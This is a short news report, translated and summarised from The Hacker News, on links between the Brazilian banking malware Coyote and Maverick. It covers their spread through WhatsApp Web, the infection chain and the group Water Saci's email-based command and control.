Security researchers have identified connections between two banking malware strains targeting users and financial institutions in Brazil: Coyote and the recently discovered Maverick. Both malicious programs are written in .NET and share identical functionality for decrypting banking URLs and monitoring financial applications. The most concerning characteristic common to both is the ability to propagate through WhatsApp Web, exploiting the app's popularity in Brazil, which has over 148 million active users.
Maverick was first documented by Trend Micro last month and attributed to a threat group named Water Saci. The campaign involves two main components: a self-propagating malware called SORVEPOTEL, which spreads through the web version of WhatsApp, and the Maverick payload itself, delivered through ZIP files. The malware monitors active browser tabs for URLs matching an encoded list of Latin American financial institutions. When a match is found, the program establishes contact with a remote server to download additional commands and serve phishing pages to steal banking credentials.
CyberProof revealed technical details about Maverick's infection chain. The ZIP file contains a Windows shortcut that, when executed, uses cmd.exe or PowerShell to connect to an external server and download the first stage of the payload. The PowerShell script is capable of launching intermediate tools designed to disable Microsoft Defender Antivirus and UAC, as well as retrieving a .NET loader. This loader features anti-analysis techniques to check for the presence of reverse engineering tools and has geographic verification mechanisms, installing Maverick only after confirming the victim is located in Brazil through timezone, language, region, and date/time format verification.
Trend Micro documented a new Water Saci attack chain with even more sophisticated characteristics. The attack uses email-based command and control infrastructure, employing IMAP connections to terra.com.br email accounts with hardcoded credentials. Some of these accounts are protected by multi-factor authentication, forcing attackers to manually enter one-time authentication codes. The malware implements a sophisticated remote control mechanism that allows criminals to pause, resume, and monitor WhatsApp propagation in real time, turning infected machines into a botnet. The list of supported commands includes system information collection, command execution, screen capture, file management, and even system restart or shutdown. The campaign's widespread nature is driven by WhatsApp's massive user base in Brazil, and researchers indicate that Water Saci is likely linked to Coyote, operating within the same Brazilian criminal ecosystem.
This post was translated and summarized from its original version using AI, with human review.
Source: The Hacker News